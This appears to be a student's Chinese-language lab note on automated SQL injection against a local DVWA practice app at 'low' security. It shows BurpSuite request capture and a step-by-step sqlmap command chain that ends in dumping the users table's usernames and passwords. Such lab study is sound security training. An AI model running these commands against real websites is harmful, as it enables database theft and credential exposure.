跳转至

2-SQL工具注入(low)

一、SQL注入漏洞

1,SQL语言:数据库操作语言(增删改查) 数据库存储的是网站的相关信息 数据库信息泄露:拖库--把网站的数据库拖走了 2,SQL注入漏洞的利用方式 --手工注入

--工具注入--SQLMAP 3,SQL工具注入

二、工具介绍

1,SQLMAP使用

(1)安装python,sqlmap。在sqlmap.py打开cmd,进行操作 (2)SQLMAP利用方式 image1 注意: | 网址-u | |--------| | 文件-r | 查看漏洞 | E:\安全工具\sqlmap1.4.3-11\sqlmap>python sqlmap.py -u "网址" | |---------------------------------------------------------------| i-先去拿这个网站的数据库 | E:\安全工具\sqlmap1.4.3-11\sqlmap>python sqlmap.py -u "网址" --current-db | |--------------------------------------------------------------------------------| Ii-再拿取这个网站数据库中的数据表 | E:\安全工具\sqlmap1.4.3-11\sqlmap>python sqlmap.py -u "网址" -D 数据库名 --tables | |----------------------------------------------------------------------------------------| Iii-然后再获取这张数据表中的数据列 | E:\安全工具\sqlmap1.4.3-11\sqlmap>python sqlmap.py -u "网址" -D 数据库名 -T 表名 --columns | |-------------------------------------------------------------------------------------------------| Iv-拿取数据 | E:\安全工具\sqlmap1.4.3-11\sqlmap>python sqlmap.py -u "网址" -D 数据库名 -T 表名 -C 列名(可多个)--dump | |---------------------------------------------------------------------------------------------------------------|

2,抓包BurpSuite

安全工具--抓包--BurpSuite 代理软件 网站代理 四大功能--拦截、抓包、改包、重放

三、准备工作

1,查看ip地址

鼠标右键单击开始菜单选择运行,在运行窗口中输入cmd点击确定,接着在输入ipconfig按下回车键,之后我们就可以看到ip地址了。 image2

2,修改网络端口

image3 3,r+windows drivers 打开host ,将127.0.0.1 修改为ip地址 4,把安全等级设置为low

三、SQL工具注入(low)

1,打开BurpSuite后进行SQL Injection image4

备注:之前的错误操作

访问http://127.0.0.1/DVWA-master/login.php,得到

![image5](../../assets/8441a3e6da424022849aed321302edbe.jpg)

问了助教后得知:修改了“hosts”所以不能使用127.0.0.1,得使用本机的IP地址。

2, save item 导出到桌面,命名7.txt 安装python环境,下载sqlmap包,按照如下命令执行查看漏洞 如果是文件,则“-r”;如果是网站,则“-u” image6

--current-db
-D dvwa -tables
-D dvwa -T users -columns
-D dvwa -T users C users, password -dump